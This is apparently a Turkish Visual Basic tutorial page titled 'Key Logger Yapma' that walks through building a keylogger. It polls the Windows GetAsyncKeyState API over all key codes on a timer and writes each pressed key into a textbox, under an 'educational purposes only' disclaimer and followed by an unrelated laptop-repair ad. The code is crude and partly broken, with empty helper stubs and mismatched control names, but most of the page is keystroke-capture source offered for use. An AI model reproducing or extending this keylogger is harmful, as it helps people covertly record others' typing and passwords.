Program Yapmak | Programcılık Hakkında Her Şey | VİSUAL BASİC 6.0 | C, C++ ve C# Yazılım Dilleri | VB.NET Yazılım Dili

Key Logger Yapma


UYARI:  BU DERS SADECE EĞİTİM AMAÇLIDIR. KÖTÜYE KULLANIMA TEŞVİK YOKTUR.


Visual Basic kullanarak birlikte bir key logger yapmaya çalışalım.

Bir form oluşturalım ve forma:
 • 1 adet rich textbox ve
 • 1 adet timer ekliyoruz.
  Formun "General" bölümüne:

  "Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer"


  kodunu ekleyin.

  Formun load kısmına:

  "Timer1.Start()"


  Timer'ın içine ise şunları ekleyin:

  CheckKeys() 'Tuşları yakalayıp belirleyen yordam
    End Sub
  
    Private Sub CheckKeys()
      Dim keyResult As String ' Döngü içerisinde iken kullanılacak geçici değişken
      Dim keyIndex As Long
      For keyIndex = 1 To 255 ' Toplam 255 adet tuş olduğu için 1den 255e kadar
        'For-Next ile döneceğiz.
        keyResult = " "    ' Önce keyResult 'ı syfyrlayalym,
        keyResult = GetAsyncKeyState(keyIndex) ' Sıradaki tuşun durumunu öğrenelim,
        If keyResult = -32767 Then 'Tuş basılı ise geriye -32767 dönecektir.
          Call Windows_OnKeyPress(keyIndex, GetShift, GetCtrl, GetAlt) ' Event' ı simule etmek için tuşun
          ' değerini Sub' a geçirelim.
        End If
      Next keyIndex
    End Sub
    Private Sub Windows_OnKeyPress(ByVal KeyAscii As Long, ByVal Shift As Integer, ByVal Ctrl As Integer, ByVal Alt As Integer) ' Tuş Yakalamada Event'ı
      ' Simule etmek için kullanılacak
      ' Sub
      TextBox1.Text = TextBox1.Text & Chr(KeyAscii) & Shift
    End Sub
    Private Function GetCapsLock() As Boolean
    End Function
    Private Function GetShift() As Long
    End Function
    Private Function GetCtrl() As Long
    End Function
    Private Function GetAlt() As Long 
   End Function


  Kolay gelsin...
Sincan Laptop tamiratı ile alakalı içeriklerin bulunduğu web siteden bilgilere ulaşabilirsiniz. Sincan'da laptop tamiratını en iyi yapan yerleri sorgulayabilirsiniz. Cihan KOÇ
=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=